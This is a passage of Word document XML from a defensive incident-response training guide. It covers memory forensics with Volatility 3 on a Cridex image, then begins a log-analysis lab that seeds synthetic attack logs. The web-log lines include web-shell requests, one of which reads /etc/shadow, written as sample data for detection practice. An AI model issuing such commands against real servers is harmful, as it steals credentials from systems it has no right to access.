      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls -lh /tmp/cridex.vmem 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If the mirror is unavailable, any .vmem / .lime / .raw image works — including one captured in Lab 21.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Identify the image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem windows.info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Output identifies the OS, build, and addresses Volatility will use for the analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — List processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem windows.pslist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem windows.pstree</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Orphans (PPID = 0 or pointing to a dead parent)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Office app spawning cmd.exe / powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Multiple svchost.exe outside services.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Hunt hidden processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem windows.psscan       # scans pool, finds unlinked PIDs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem windows.psxview      # diff between listing methods</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A row that appears in psscan but not pslist is a rootkit-hidden process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Recover command lines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem windows.cmdline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The command line of a malicious process often contains the C2 URL, base64 payload, or -NoProfile -EncodedCommand … — your fastest IOC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Network connections at time of capture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem windows.netscan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Maps PID → local IP:port → remote IP:port. Cross-reference remote IPs against threat-intel (Lab 10).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — DLL injection / code injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem windows.dlllist --pid &lt;SUSPECT_PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem windows.malfind</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>malfind looks for memory regions marked RWX with PE headers or shellcode — a textbook process-injection indicator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Dump a suspect process and triage it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/cridex.vmem -o /tmp/dump windows.dumpfiles --pid &lt;SUSPECT_PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls /tmp/dump | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Then run the file through Lab 9 (strings, yara, VirusTotal hash)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum /tmp/dump/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You now have a static artefact for AV/sandbox submission — derived from RAM only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 10 — Linux memory images</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>For Lab 21's AVML output, the equivalent plugins live under linux.*:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/case_001/memory.lime linux.pslist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -f /tmp/case_001/memory.lime linux.bash    # recover shell history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>linux.bash is gold for incident response — it shows the attacker's typed commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Install and orient Volatility 3 against a memory image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Enumerate processes, hidden processes, command lines, and live connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Detect injected code with malfind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dump processes to disk and feed them into Lab 9's static triage workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to install and orient Volatility 3 against a memory image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 23 — Log Analysis for Incident Response</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work an incident from a pile of journalctl and web-server logs: pivot from one IOC to the next, build a timeline, and produce the "Who, What, When, Where, Why" rows that feed the executive report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will work an incident from a pile of journalctl and web-server logs: pivot from one IOC to the next, build a timeline, and produce the "Who, What, When, Where, Why" rows that feed the executive report. This maps to CySA+ 3.2 (Data and log analysis, IoC, Detection and analysis).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="3507867"/>
            <wp:docPr id="21" name="Picture 21"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_6438df1292.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="3507867"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Seed a realistic log set</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y jq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/lab23 &amp;&amp; cd /tmp/lab23</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cat &gt; auth.log &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:01 host1 sshd[1001]: Failed password for root from 203.0.113.7 port 5001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:02 host1 sshd[1002]: Failed password for root from 203.0.113.7 port 5002</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:03 host1 sshd[1003]: Failed password for root from 203.0.113.7 port 5003</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:06 host1 sshd[1006]: Accepted password for root from 203.0.113.7 port 5006</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:15 host1 sudo: root : COMMAND=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:02:01 host1 sshd[1100]: Accepted publickey for backup from 10.0.0.5 port 22</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cat &gt; web.log &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:08 203.0.113.7 GET /admin 200 1234</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:09 203.0.113.7 POST /upload.php 200 9876</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:11 203.0.113.7 GET /uploads/shell.php?cmd=id 200 18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:01:00 203.0.113.7 GET /uploads/shell.php?cmd=cat+/etc/shadow 200 2456</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cat &gt; netflow.log &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:08 203.0.113.7 -&gt; 10.0.0.50 :80 1500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:11 203.0.113.7 -&gt; 10.0.0.50 :80 2200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:10:00 10.0.0.50 -&gt; 185.220.101.45 :443 1073741824</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
